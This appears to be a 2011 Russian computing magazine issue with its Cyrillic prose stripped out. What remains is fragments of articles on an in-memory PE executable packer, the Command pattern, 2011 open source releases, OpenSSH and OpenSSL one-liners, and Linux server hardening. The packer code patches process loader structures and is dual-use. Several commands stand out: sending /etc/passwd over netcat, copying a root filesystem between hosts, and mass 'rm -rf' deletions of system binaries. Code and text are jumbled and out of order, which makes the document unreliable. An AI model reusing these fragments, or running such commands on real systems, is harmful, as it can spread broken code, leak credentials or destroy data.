// PE-
HMODULE hModule = GetModuleHandle(NULL);
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNTHeaders =
MakePtr(PIMAGE_NT_HEADERS,hModule,pDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER pSections =
IMAGE_FIRST_SECTION(pNTHeaders);
// ,

PIMAGE_SECTION_HEADER pLastSection =
&pSections[pNTHeaders->FileHeader.NumberOfSections - 1];
// ,
LPBYTE pbPackedImage = MakePtr(LPBYTE, hModule,
pLastSection->VirtualAddress);
//
DWORD dwPackedImageSize = pLastSection->SizeOfRawData;

, ,
. , , ,
. , ,
.
:
LPBYTE pbPackedImage = (LPBYTE) 0xDEADBEEF;
DWORD dwPackedImageSize = 0xBEEFCACE;


, 0xDEADBEEF , 0xBEEFCACE
.
, , ,
.
aplib (www.ibsensoftware.
com),
, - (LZ).
,

Windows !



XP, ntdll.dll
:
NTSTATUS RtlCompressBuffer(
    __in  USHORT CompressionFormatAndEngine,
    __in  PUCHAR UncompressedBuffer,
    __in  ULONG UncompressedBufferSize,
    __out PUCHAR CompressedBuffer,
    __in  ULONG CompressedBufferSize,
    __in  ULONG UncompressedChunkSize,
    __out PULONG FinalCompressedSize,
    __in  PVOID WorkSpace
);
NTSTATUS RtlDecompressBuffer(
    __in  USHORT CompressionFormat,
    __out PUCHAR UncompressedBuffer,
    __in  ULONG UncompressedBufferSize,
    __in  PUCHAR CompressedBuffer,
    __in  ULONG CompressedBufferSize,
    __out PULONG FinalUncompressedSize
);

, . , ,
, Windows 2000,
NT 4.0 ;), RtlCompressBuffer\
RtlDecompressBuffer .
Platform SDK ,
,
GetProcAddress:

// RtlDecompressBuffer

DWORD (__stdcall *RtlDecompressBuffer)
(ULONG,PVOID,ULONG,PVOID,ULONG,PULONG);
// RtlDecompressBuffer ntdll.dll
(FARPROC&)RtlDecompressBuffer = GetProcAddress(
LoadLibrary("ntdll.dll"), "RtlDecompressBuffer" );

, ,
, . (
) :
DWORD dwImageSize = 0;
DWORD dwImageTempSize = dwPackedImageSize * 15;
//
LPVOID pbImage = VirtualAlloc( NULL, dwImageTempSize,
MEM_COMMIT, PAGE_READWRITE );



APLIB,




//
RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1,
pbImage, dwImageTempSize,
pbPackedImage, dwPackedImageSize,
&dwImageSize);

COMPRESSION_FORMAT_LZNT1 ,
LZ-.
(bit.ly/sV9SVu),
.
(pbImage) PE-.
, ,
PE- Windows.
- :
1. () ,
Image Base (OPTIONAL_
HEADER).
2. PE- , .
3. ,
.
, PE-
, , ,
PE-.
,
.
,
PE-,
, gr8 hellknights (bit.ly/
tc65cB) , ;).
PE- , ,
(
):
HMODULE LoadExecutable (LPBYTE image,
DWORD* AddressOfEntryPoint)


(
, PE-) (
AddressOfEntryPoint). ,
, ,
, , .
, - .
, ,
. , .
, GetModuleHandle(NULL) Image
Base , . FindResource LoadResource , .
. ,

,
.
PEB (Process Environment
Block), Image Base. PEB
, 0x30
FS.
PPEB Peb;
__asm {
push eax
mov eax, FS:[0x30];


OllyDbg

mov Peb, eax


pop eax
}
// hModule PE
Peb->ImageBaseAddress = hModule;


LDR_DATA, PEB. :
InLoadOrderModuleList c ;
InMemoryOrderModuleList c ;
InInitializationOrderModuleList c
.
. - :
// ,
//
PLDR_DATA_TABLE_ENTRY pLdrEntry = (PLDR_DATA_TABLE_ENTRY)
(Peb->Ldr->ModuleListLoadOrder.Flink);
pLdrEntry->DllBase = hModule;
...


. ,
.
LPVOID entry = (LPVOID)((DWORD)hModule + AddressOfEntryPoint);
__asm call entry;

AddressOfEntryPoint
(RVA, Relative Virtual Address) ,
optional header LoadExecutable. RVA (
).


VS 2010
,
-, 10 .
, .
(
/C++) :

(/O1),
.



,


.DATA
( /Os).
++,
.
(/GS-).
, .
():
. , -
.rsrc,
. , PE- 512 , .
.
.
(/DYNAMICBASE:NO), (.reloc).
. - , 0x02000000.
GetModuleHandle(NULL) .
.
, CRT-: /ENTRY:WinMain.
, pragma
, , .

:
#pragma comment(linker,"/MERGE:.rdata=.text")

.rdata,
, (,
. .), .text. ,
.data.
#pragma comment(linker,"/MERGE:.data=.text")
// .data ,
//
#pragma comment(linker,"/SECTION:.text,EWR")

,
1,5 .

, . ,
,
. , :
HANDLE hFile = CreateFile(argv[1], GENERIC_READ,
FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwImageSize = GetFileSize(hFile, 0);
LPBYTE lpImage = new BYTE[dwImageSize],
lpCompressedImage = new BYTE[dwImageSize];
DWORD dwReaded; ReadFile(hFile, lpImage,
dwImageSize, &dwReaded, 0);
CloseHandle(hFile);

.
, PE-,
. ., ,
. RtlCompressBuffer
RtlGetCompressionWorkSpaceSize.
, ,
, .
, (
), :
DWORD format =
COMPRESSION_FORMAT_LZNT1|COMPRESSION_ENGINE_STANDARD;
DWORD dwCompressedSize, dwBufferWsSize, dwFragmentWsSize;
RtlGetCompressionWorkSpaceSize(
format, &dwBufferWsSize, &dwFragmentWsSize);
LPBYTE workspace = new BYTE [dwBufferWsSize];
RtlCompressBuffer(format, //
lpImage,
//
dwImageSize,
//
lpCompressedImage,
//
dwImageSize,
//
4096,
// ,
&dwCompressedSize,
//
//
workspace);
//

,
. ,
.
bin2h (www.deadnode.org/sw/bin2h/). ,
- :


,
:

.
, ,
xor
. ,
,


. -
. ,
xor .
,
,
.
- ,
, .


-
. .

,
-

, .


unsigned int loader_size = 1536;


unsigned char loader[] = {
0x4d,0x5a,0x00,0x00,0x01,0x00,0x00, ...

. , , ,
.
90- .
, PE-
. ,

. , ,
, ,
, () .
,
;).
:
(.text) .
,
(SizeOfRawData). (FileAlignment).
(Misc.VirtualSize), .
(OptionalHeader.
SizeOfImage) [ ] + [ ],
FileAlignment.
.
. ,
(Misc.VirtualSize)
(.text) ,
. ,
511 .
, , .
:

//

PBYTE pbLoaderCopy =
new BYTE[loader_size + dwCompressedSize + 0x1000];
memcpy(pbLoaderCopy, (LPBYTE)&loader, loader_size);
//
PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)pbLoaderCopy;
PIMAGE_NT_HEADERS nt =
MakePtr(PIMAGE_NT_HEADERS, pbLoaderCopy, dos->e_lfanew);
//
PIMAGE_SECTION_HEADER text = IMAGE_FIRST_SECTION(nt);
//
memcpy(&pbLoaderCopy[
text->PointerToRawData + text->Misc.VirtualSize],
lpCompressedImage, dwCompressedSize);
// , Misc.VirtualSize
text->SizeOfRawData =
ALIGN(text->Misc.VirtualSize + dwCompressedSize,
nt->OptionalHeader.FileAlignment);
// ( )
text->Misc.VirtualSize += dwCompressedSize;
//


notepad.exe , UPX!

nt->OptionalHeader.SizeOfImage =
    ALIGN(text->Misc.VirtualSize + text->VirtualAddress,
          nt->OptionalHeader.FileAlignment);
//
DWORD dwNewFileSize = text->SizeOfRawData +
    text->PointerToRawData;

, 0xDEADBEEF
0xBEEFCACE, , ! 0xBEEFCACE ,
0xDEADBEEF . [ ] + [
] + [ ].
, Misc.VirtualSize,
.
:
for (int i = 0; i < loader_size; i++)
    if (*(DWORD*)(&pbLoaderCopy[i]) == 0xBEEFCACE)
        *(DWORD*)(&pbLoaderCopy[i]) = dwCompressedSize;
    else if (*(DWORD*)(&pbLoaderCopy[i]) == 0xDEADBEEF)
        *(DWORD*)(&pbLoaderCopy[i]) =
            nt->OptionalHeader.ImageBase +
            text->VirtualAddress +
            text->Misc.VirtualSize;

, , .
, CreateFile/WriteFile.

UPX
notepad.exe 1 : 46 592
48 128 UPX. . .
,
, .
! .
,
. z


deeonis (deeonis@gmail.com)





. -
, , -
.
,
,

.
,

.


, ,
. ,
.
,
. <ctrl-0> <ctrl-9>,
ctrl-z .
, : switch,

- , . , -,
.
hotkeys,
, -
. -, , . ,
switch .
,
, , , -
.

, HotKeys
class Calculator
{
public:
    void runCalc();
    void closeCalc();
};
class Printer
{
public:
    void printDocument();
    void printImage();
    void printEmail();
};
class Browser
{
public:
    void runBrowser();
    void closeBrowser();
};

,
, .
execute(),
- .

class Command
{
public:
    virtual void execute() = 0;
};

, Command,
execute(). ,
, .
RunCalcCommand,
Command, execute() runCalc()
Calculator.

class RunCalcCommand: public Command
{
    Calculator *calc;
public:
    RunCalcCommand(Calculator *excalc)
    {
        calc = excalc;
    }
    void execute()
    {
        calc->runCalc();
    }
};

,
, RunCalcCommand
Calculator. .
ModernCalculator, .
, ,

//


, , .
, .
API. ,
, ,
.
,
, API- ,
, , , ,
. hotkeys ,
.
,
, .
, ,
.


Java



,
.
.
Command.
.

.
, Ctrl -
, . , , ctrl-a ctrl-k,
.

,
execute() ,
.
hotkey
//
const int comCount = 10;
Command* commands[comCount];
Calculator *calc = new Calculator();
commands[0] = new RunCalcCommand(calc);
//
//
hotkey = catchHotKey();
//
int index = hotkey2index(hotkey);
commands[index]->execute();

- .
Command,
, .
. , , , , , hotkeys,
- .


, .
ctrl-z .
,
, .
Command.
Command,
class Command
{
public:

{
calc->runCalc();
}
void undo()
{
calc->closeCalc();
}
}

undo(),
-. ,
.
, undo() RunCalcCommand closeCalc() Calculator.
.

//
const int comCount = 10;
Command* commands[comCount];
Command *lastCommand = new NoCommand();
Calculator *calc = new Calculator();
commands[0] = new RunCalcCommand(calc);
//
//
HotKey *hotkey = catchHotKey();
// ,
if (hotkey->str() == "ctrl-z")
{
lastCommand->undo();
}
//

lastCommand

ctrl-z . ,
NoCommand. :
NoCommand
class NoCommand: public Command
{
public:

void execute() = 0;
void undo() = 0;
}
class RunCalcCommand: public Command
{
Calculator *calc;
public:
RunCalcCommand(Calculator *excalc)
{
calc = excalc;
}
void execute()


Wikipedia .


void execute() {};


void undo() {};

Client

Invoker

- .
, .
lastCommand NULL,
undo()
, ,
, .
- , .
,
, ,
.

. -
. , , ctrl-z.

, .

. , .

class MacroCommand: public Command


{
Command *commands;
int comCount;
public:
MacroCommand(Command *comArray, int elemCount)
{
commands = comArray;
comCount = elemCount;
}
void execute()
{
for (int i = 0; i < comCount; i++)
{
commands[i]->execute();
}

Receiver
Action()

Command
Execute()

ConcreteCommand
Execute()
state

receiver->Action();

undo().
,
, , execute()
undo().




. . , ,
.
, Command.
,
. execute(). ,
, execute().
.
.
Command
class Command
{
public:
    virtual void execute() = 0;
    virtual void undo() = 0;
    virtual void load() = 0;
    virtual void store() = 0;
};

}
void undo()
{
for (int i = 0; i < comCount; i++)
{
commands[i]->undo();
}
}

load() ,
store() .
,
. ,
.


.

, MacroCommand
Command execute undo. .
, . execute()
.



-
. ,

. ,
. z


UNIXOID

Adept (adeptg@gmail.com)


open source 2011
WWW

OPEN
SOURCE


kernelnewbies.
org/LinuxChanges

changelog
Linux.


Linux 3.1. ,

open source 2011


.
, Microsoft Oracle

-
, ,

: appdb.
winehq.org, wiki.php.net, mysql.com,
sourceforge.net, kernel.org linux.com.


LINUX

Linux. , ,
,
. 2011
. , 2.6.40,

3.0. (
Big Kernel Lock),
,
, ,
2.6
- .
( ),
(

).
2.6.37
2.6.39 3.03.1.
( )
.
,
, :
Intel GMA500 (-
Intel Atom Z-).

- : , Intel
, Intel GMA500, , PowerVR SGX 535 Imagination
Technologies.
, .
512
libata (, 4 ,
).
USB
USB2VGA- (
USB).
: UniCore-32 (
), 64-bit Tilera
(
100 , , ,

GNOME 3.2 Fedora 16


Debian 6

) OpenRISC (

ARM10).
NFC (Near Field
Communication),

( 10 ).

(,
Google Wallet).
,
SSD ( , dm-crypt
ext4).
,
Microsoft Kinect Nintendo Wii Remote.
DRM-
(Direct Rendering Manager,
Digital rights management) Intel, Radeon
Nouveau. Intel
( Sandy Bridge) .
Ivy Bridge
Radeon Nouveau.
: ,
NVIDIA
.


:
KVM
(
).
Xen Dom0 (-) .
,
( , Debian) Xen.
,

(pass through) PCI
.
cgroups ( -

, , LXC )

( IOPS').
(
).
,
, :
Btrfs
LZO.

zlib,
,
.
Btrfs
( -o
autodefrag).
SquashFS,
LiveCD, XZ
.

:
Accel-pptp PPTP/PPPoE/
L2TP- PPTP-,
. ,
, user-space. ,
.
B.A.T.M.A.N.
(Better Approach To Mobile Adhoc
Networking), mesh (,
).
iSCSI
target.
DFS-
(Distributed File System) Windows 2008.
.

( ,
, ).

DESKTOP ENVIRONMENT

TOP10 Distrowatch

ipset
netfilter,
IP/MAC- TCP/
UDP-.
Wake on WLAN
.

:


( ), session ID. ,
make
.
, 1 /proc/sys/
kernel/sched_autogroup_enabled.
,
.
, . -rt (Realtime) ,
Linux ,
Linux 3.0 (
2.6.33).

,
. Linux 3.1
pf-kernel,
BFS,
- BFQ
TuxOnIce, Linux 2.6.37 (
phoronix.com).
Release early, release often
Linux
. ,
,
Linux,
Linux Foundation 2011 Long Term Support Initiative (LTSI).
-


,
. ,
Gnome 3.0.
, Gnome
2.
(, ,
Gnome3 , XFCE, Gnome2).
, :
Control Center
.
Empathy
, Evince
, Eye of GNOME
.
Gnome 3.2

:
web:
Google Calendar,
Google Docs.

.
.
SIP Empathy.
Apple Filing Protocol
Apple.
Gnome3

c , JavaScript
CSS. extensions.gnome.org

(, Firefox
) .
Gnome3 Gnome2
, ,
Gnome
Mate Desktop Environment (MDE).
KDE ( , , 15 )
.
, .
4.6 4.7. ,
:
OpenGL ES 2.0 Kwin,
KDE
. Kwin
.
Plasma Active ,
.
(Activities),

Activity ( )
Activity.
( SQL
GDB)
Kate.
Gwenview Ksnapshot

.

LibreOffice 3.4.1 Ubuntu Oneiric Ocelot


HAL.
Zeitgeist ( ).
Nepomuk.
VPN NetworkManager 0.9
3G.
Kontact Suite
Akonadi.
KDM
Grub, Grub KDM.
Python Kdevelop.
digiKam ( ,
).
, KDE4,

KDE3, , Trinity,
,
Qt4.
KDE
:
ownCloud 2
Dropbox, LAMP
.
Necessitas ( Qt Android)
,
alpha.

Linux
: , .
, 2011
, Debian, 6 ( Squeeze). :
Grub2 .
( ) init- .
OSS.
IPv6.
Dpkg XZ,
Perl
.
29 .
, 63 %
Linux-
Debian.
Linux 2.6.32
( ), GCC 4.4.5, Xen 4.0.1, X.Org 7.5, KDE SC 4.4.5,
GNOME 2.30, Xfce 4.6, OpenOffice.org 3.2.1.
ConsoleKit ( ) PolicyKit ( ).
DNSSEC.
ISO- ,
dd.
Debian GNU/kFreeBSD
FreeBSD. 32- 64-
.


Linux Mint 12

backports.org,

,
backports.debian.org.
Debian ,
( 18
6).
( 13 )
, debian.org.
rolling release
Debian (
Gentoo Arch Linux). Debian CUT (Constantly Usable
Testing)
,
.
Debian,
Ubuntu,
: 11.04 (Natty Narwhal)
11.10 (Oneiric Ocelot). :
Unity ( Gnome3)
DE , .
Software Center
,

(, ,
qtnx).
.
,
. ,
.
Ubuntu One
2 5 ( $2,99
$29,99 20 ). ,

.
Android, , ,

U1 .
, :
LibreOffice OpenOffice,
Banshee
Rhythmbox, Evolution Thunderbird,
LightDM
GDM, Synaptic PiTIVi,
Deja Dup
. LiveCD (, , ),
DVD- ,
LibreOffice, Inkscape, GIMP
Pitivi. Ubuntu Lubuntu LXDE.
,
Canonical
:
Ubuntu ARM Server Edition
ARM (
,
).
OpenStack Eucalyptus.
Orchestra ( ,
)
Juju (
).
Ubuntu
, Unity,

, distrowatch.com Ubuntu
.
Linux Mint ( Ubuntu), 11
( Katya, Ubuntu 11.04)
12 (Lisa Ubuntu 11.10). Mint , Gnome
Shell Gnome2.
Mate Desktop
Environment Gnome2.
-

, Canonical
Ubuntu Developer Summit,
,
.
12.04 LTS (Long Term Support)
:
desktop-
, ,

(-,
).
64- .
LiveCD 750 .
Rhythmbox Banshee Tomboy Gnote, Mono
LiveCD.
Unity
.
KVM
ARM,
SPICE, .
- (,
Lightning Thunderbird).
2011 RPM-, Fedora: 15
(Lovelock) 16 (Verne).
:
GRUB2.
Gnome2 Gnome3.

firewalld,

.
SPICE Virt Manager.
:
p<slot_number>p<port_
number> PCI em<port_number>

.
setuid
.
systemd.
UID GID 1000 UID/GID .
, Novell, openSUSE
2011
: 11.4 12.1.
init-
systemd, Snapper
btrfs
ownCloud.
BSD- . FreeBSD Xen,
ZFS (
),
/ AES
AES-NI .
Changelog FreeBSD 9 :

Clang, GCC.
RAID-
ataraid graid,
GEOM.

BSDInstall.
RCTL,
(CPU, memory ) , Jail.
Capsicum
(
)
.

USB-
USB 3.0.
FreeBSD
BHyVe.
OpenBSD : 4.9 5.0 ( , ).
AESNI, 4 64
, Wake on LAN,
.
Linux
( ), ,
, . Linux Android (

200 ),

, , 2011 : 3 ( )
4 (,
).

, . :

, .
,
.
Face Unlock
.
,
.
.

( User Agent,
Google Chrome).

[Figure: StatCounter Global Stats, 2011. Series: IE, Firefox, Chrome, Safari, Opera; vertical axis 0% to 50%. Source: StatCounter]


OpenBSD 5.0

Nokia N9,

MeeGo, ,
MeeGo
Tizen, HTML5 .
(

2012-), , Linux
Foundation LiMo Foundation.

-
.

.
changelog
FireFox 4:
Google Chrome:

.

(
, ).
Web Console (Web
Inspector) Firebug.
WebM VP8
<video>.
, ,
Mozilla ( Firefox Sync).
WebGL (,

OpenGL JavaScript).

API IndexedDB,
JavaScript
web-
.
Web
Sockets
web-.
about:memory, ,
.
JavaScript-


.
HTTP- Do Not
Track, . :)

, Flash-
.
,
,
,
59:
.
about:permissions
,
HTML5 .
HTML5-
progress contextmenu.
, (,
Skype Java), .
Google Chrome, Firefox
,
(
9 15).

, :
WebGL .
JavaScript.
, .
.

( Google).
Flash Cookie.
PDF.
API IndexedDB.
Native Client,
C/++
.
StatCounter,
Google Chrome ( IE),
Firefox.

TO BE CONTINUED
,
, .
, (
GCC) ARM,
,
. Btrfs
(,
FS ). Flash, ,
( , , ).

Linux Doom 3
. , ,
GIMP 2.8. ,
, : :). z

Ubuntu Software Center


(execbit.ru)

INFO

OpenSSL

: list-standard-commands,
list-message-digest-commands, list-cipher-commands.

OPENSSL
OPENSSH,

, OpenSSH OpenSSL,
.

.
,
.

.
OPENSSH
OpenSSH, Telnet, .
, , . ,
, ,


OpenSSL Gmail


OpenSSL


.
, .
OpenSSH
.
, . ,
.
ssh (~/.ssh/config) :
ControlMaster auto
ControlPath ~/.ssh/mux_%h_%p_%r

, ,
.
. ,
SSH- ,
,
SSH-.
:
ForwardAgent yes
Host host
HostName host.com
ProxyCommand ssh proxy-host.com \
netcat -q 600 %h %p

ssh host host.com


proxy-host.com.
HTTP-.
,
HTTP-.
Corkscrew (www.agroman.net/corkscrew/), SSH- HTTP. ( proxy.com 80
HTTP- ):


Host *
ProxyCommand corkscrew proxy.com 80 %h %p

HTTP-.
.
, , pv
SSH:
$ sudo apt-get install pv
$ yes | pv | ssh host.com "cat > /dev/null"

.
UNIX- tcpdump,
. OpenSSH :
$ ssh root@host.com tcpdump -w - 'port !22' \
| wireshark -k -i -

, host.com,
wireshark .
.

, ,
. cstream:
$ sudo apt-get install cstream
$ tar -cj /backup | cstream -t 512k | \
ssh host 'tar -xj -C /backup'

SSH-. , ,
SSH- ,
, .
autossh,
,


SSL- Gmail

, :
$ sudo apt-get install autossh
$ autossh -M50000 -t server.example.com \
'screen -raAd mysession'


. :
$ echo "uptime" | pee "ssh host1" "ssh host2" \
"ssh host3"

.
-
, - .
:
$ ssh user@host cat //// | \
diff //// -

,
:

$ sudo apt-get install multitail


$ multitail -l 'ssh host1 "tail -f \
/var/log/apache2/error.log"' -l 'ssh host2 \
"tail -f /var/log/apache2/error.log"'

11
.
,
, :
$ ssh root@host1 "cd / && tar -cf - ." |\
ssh root@host2 "cd / && tar -xf -"

12
.
, , . .
xclip:
$ ssh user@host cat /.txt | xclip

$ diff <(ssh host1 cat /etc/apt/sources.list) \
<(ssh host2 cat /etc/apt/sources.list)

13 SSH.
, NTP-
NTP-, :

10
. multitail SSH
:

# date --set="$(ssh user@server date)"

14
.
, .
, SSH
:

CPU0: RNG AES


,
CPU VIA Eden (

AES):
% openssl speed -elapsed -evp aes-256-cbc
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-256-cbc     21780.33k    79591.78k   198578.08k   317102.05k   383371.05k


# ssh remotehost 'dpkg --get-selections' | \
dpkg --set-selections && dselect install

15 .
X- , ImageMagick:
# ssh user@host "DISPLAY=:0.0 import -window \
root -format png -" | display -format png -

, > file.png.


16 . ,
,
(, ), SSH ,
. :
Host host.com
Ciphers arcfour256
MACs umac-64@openssh.com

17 .
. dd:
$ dd if=/dev/dsp | ssh -c arcfour -C \
user@host dd of=/dev/dsp

18 . ,
,
:
$ ssh -T user@host < script.sh

SSL-. s_time. SSL, openssl:


$ openssl s_time -connect gmail.com:443 \
-www /test.html -new
103 connections in 0.75s; 137.33 connections/user sec,
bytes read 42436
103 connections in 31 real seconds, 412 bytes read per
connection


:
$ openssl s_time -ssl3 -cipher HIGH \
-connect gmail.com:443 -www / -new
99 connections in 0.73s; 135.62 connections/user sec,
bytes read 40788
99 connections in 31 real seconds, 412 bytes read per
connection

SSL-.
. :

OPENSSL
OpenSSL
,
SSL Netscape.
, OpenSSL
SSL- , ,
. . :
RSA DSA ( rsa, dsa,
dsaparam);
x509,
, ( x509, req, verify, ca,
crl, pkcs12, pkcs7);
(
enc, rsautl);
( dgst);
S/MIME ( smime).
OpenSSL SSL s_client/s_
server
( speed).
OpenSSL,

, .


OpenSSL ,

IFS=":"
for c in $(openssl ciphers -ssl3 RSA); do
echo $c
openssl s_time -connect host:443 -www / -new \
-time 10 -cipher $c 2>&1 | grep bytes
echo
done

SSL ,
, , SSL-.
SSL- , OpenSSL. OpenSSL:
$ openssl s_server -cert mycert.pem -www

:
$ openssl s_time -connect myhost:4433 \
-www / -new -ssl3


OpenSSL s_client, SSL-
. ,
. SSL-, ,
, -

x509


SSH pv

openssl, .
:

, ,
:

$ echo | openssl s_client -connect \
www.google.com:443 2>/dev/null | \
openssl x509 -dates -noout
notBefore=Oct 26 00:00:00 2011 GMT
notAfter=Sep 30 23:59:59 2013 GMT

$ cat /etc/passwd | openssl \
aes-256-cbc -a -e -pass pass: | \
netcat -l -p 8080
$ netcat :8080 | openssl \
aes-256-cbc -a -d -pass pass: > passwd

s_client ,
:

, ( /tmp/passwd):

$ openssl s_client -connect www.google.com:443 \
-cipher LOW
CONNECTED(00000003)
140513251690152:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:658:

$ for f in * ; do [ -f $f ] && \
openssl enc -aes-256-cbc -salt -in $f \
-out $f.enc -pass file:/tmp/passwd ; done

:
$ openssl enc -d -aes-256-cbc -salt \
-in .enc -out filename \
-pass file:/path/to/passwd

, , ,
Google. s_client
(
SSL Telnet). :

, , :

$ openssl s_client -starttls smtp -crlf \
-connect smtp.gmail.com:25

$ tar c | openssl enc -aes-256-cbc -e \
> secret.tar.enc

OpenSSL ,
,
,
. openssl , ,
UNIX,
. -

OpenSSL :
$ openssl rand 8 -base64
O0Hqtv9l0sY=

/etc/passwd :
# openssl passwd -1 my-secret-pass
$1$WA7AVhQL$y9VaGwseiKRLSGoJg21TP0

, base64
, :
$ tar -c | gzip -9 | openssl enc \
-base64 > text-message.txt

MAC-:
$ openssl rand -hex 6 | \
sed 's/\(..\)/\1:/g; s/.$//'
f2:9e:56:fd:5a:93

speed


,
, OpenSSL OpenSSH,
.
,
. z


SYN/ACK

(execbit.ru)
00000000\r_NET (0000nline.ru)

LINUX-




.
Linux-

, ,
,
.
, ,
,
Linux

.


INFO


rkhunter,

,


.

,

uname dmesg,

/boot/
grub/menu.lst,

.


Drupal

.
,
,
,
. ,
, web- ftp, DNS, . .
,
, ,
. ,
, ,

.

, ,
, ,
. , , .
,

. ,
-
.
, ,
.

,
,
, .




,
,


,
FTP-, sendmail, .
, .

2.

, . ,
. ,
: web-.
web-, ,
Django. PHP+Djoomla/
Drupal? , !
,
:
1. web- ( Apache, nginx ).
2. Python, Django.
3. Django, .
4. PostgreSQL, .
5. SSH .

, . : Linux-
.
ArchLinux, (, , -
Slackware Gentoo, ).
ArchLinux , ,
Yandex ( x86_64-: http://goo.gl/EZRtQ). ISO-
.
:
/arch/setup, Select Source, <Enter>, Prepare hard drive(s), <Enter>,
ext2. Select Packages,
<Enter> . Configure system,
<Enter>, Done. Install
bootloader, ,
/boot/grub.conf, <Enter> , , Exit install.
( ISO-).

root ( )
. .
. DHCP-,
DHCP-:

ArchLinux

1.


# dhcpcd eth0

, Pacman , /etc/pacman.d/mirrorlist :
Server = ftp://mirror.yandex.ru/archlinux/$repo/os/$arch
Server = http://mirror.yandex.ru/archlinux/$repo/
os/$arch

:
# pacman -Syu

, Pacman.
.
. nginx, Python, Django
PostgreSQL:
# pacman -S nginx python2 django

, (
). : libffi,
postgresql-libs, libxml2 sqlite3, ,
. ( ). , .
.
, :

, ,

# pacman -R cryptsetup device-mapper lvm2 mdadm \
xfsprogs jfsutils reiserfsprogs


:
# pacman -R iputils keyutils krb5 heirloom-mailx ppp \
wget dbus-core wpa_supplicant libpcap libnl libldap

USB-, PCI PCMCIA- :


# pacman -R usbutils pcmciautils sysfsutils

# pacman -Qs

:
,
. -, .
GCC, binutils, ,
:
# pacman -R binutils

,
man-:
# pacman -R licenses groff man-db man-pages texinfo


RAID-. ,
, :

# pacman -R libpipeline libsasl libgcrypt libgpg-error

, .

3. , -
,
,
.
.
. , ArchLinux
-dev , /usr/include
.
:
# rm -rf /usr/include






,
ACL ..

/usr/lib ,
, .
:
# rm /usr/lib/*.a

/bin, /sbin, /usr/bin, /usr/sbin


, , .
,
, . .
.



:
# rm /sbin/{badblocks,debugfs,dumpe2fs,e2image,e2label,e2undo,resize2fs,tune2fs}

.
, :
# rm /sbin/{fdisk,cfdisk,sfdisk}


swap-:
# rm /sbin/mkfs.*
# rm /sbin/mkswap

dd install:

# rm /usr/sbin/chcon

,
cracklib,
( , ) PAM,
. , ,
:
# rm /usr/sbin/cracklib*
# rm -rf /usr/share/{cracklib,dict}

. -,
,
, .
# rm /usr/bin/pacman*
# rm /usr/bin/makepkg
# rm /etc/pacman*
# rm -rf /var/cache/pacman

# rm /bin/{dd,install}

. , ACL, capabilities
/ .
,
. , ,
(-, , ,
).
, ( acl):
# rm /usr/bin/{chacl,getfacl,setfacl}


( attr):
# rm /usr/bin/{chattr,lsattr,getfattr,setfattr}

, capablities ( libcap):

. , , initrd:
# rm -rf /lib/initcpio

:
# rm -rf /media /opt /usr/local

(
/usr/src):
# rm -rf /usr/src

, ,
/lib /usr/lib
( , ).
:
# find /bin /sbin /usr/bin /usr/sbin |\
xargs ldd | grep '\.so' |\
cut -d ' ' -f 1 | sed 's/^[ \t]*//' |\
sort | uniq

# rm /usr/sbin/{getcap,setcap}

/dev/null
:

ldd


diff ls -1 /lib /usr/lib.


.

4.
, ,
. ,
nginx, , Django . ,
, . ,
- Django-
- ,
/www ( : http
django ). ,
.
,
nginx . ArchLinux
, /etc/
rc.conf:
#
HOSTNAME="example.com"
#
interface=eth0
address=1.2.3.4
netmask=255.255.255.0
broadcast=1.2.3.4
gateway=1.2.3.4
#
DAEMONS=(hwclock syslog-ng network crond postgresql nginx)

/ /etc/rc.d, :
# /etc/rc.d/nginx restart

. , , ,
. -,
:
# passwd

-, :


, 22 80 (SSH HTTP):
#
iptables -P INPUT DROP
iptables -A INPUT -i lo -j ACCEPT
# DoS
iptables -A INPUT -p tcp -m tcp --tcp-flags \
SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT
#
iptables -A INPUT -p all -m state --state \
RELATED,ESTABLISHED -j ACCEPT
#
iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --dport 80 -j ACCEPT
# ICMP-
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 3 -j ACCEPT
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 11 -j ACCEPT
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 12 -j ACCEPT

, : .
# echo 'echo $((0xffffffff ^ (1 << 16))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 18))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 19))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 21))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local


( ),
chroot, ptrace,
,
, swap. ,
, root.

# useradd vasya

-, root- SSH:
# echo 'PermitRootLogin no' >> /etc/ssh/sshd_config
# /etc/rc.d/sshd restart

5.

, Linux-,
,

sysctl.conf,
:
#
net.ipv4.ip_forward = 0
#
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.default.accept_source_route = 0
# SYNACK
net.ipv4.tcp_synack_retries = 2
#
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
# PING-
net.ipv4.icmp_echo_ignore_broadcasts = 1
# SYN-
net.ipv4.tcp_syncookies = 1

? .
ArchLinux, ,
.
.
1. .
2. ISO- ArchLinux,
( VirtualBox ).
3. /mnt.
: /dev/sda3 - , /dev/
sda1 - /boot, /dev/sda4 - /home. :
# mount /dev/sda3 /mnt
# mount /dev/sda1 /mnt/boot
# mount /dev/sda4 /mnt/home



-

WWW,

13. /etc/fstab :

4. /media:
# mount /dev/sdb1 /media

5. :
# cd /mnt
# tar -czf /media/root.tar.gz .
# sync

6. , ISO-
ArchLinux ,
.
7.
cfdisk, :
sda1 swap (: * 2);
sda2 (: 1 );
sda3 /www (: ,
-);
sda4 /var (: 1 ).

8. :
# mkfs.ext4 /dev/sda{2,3,4}

devpts     /dev/pts  devpts  defaults               0 0
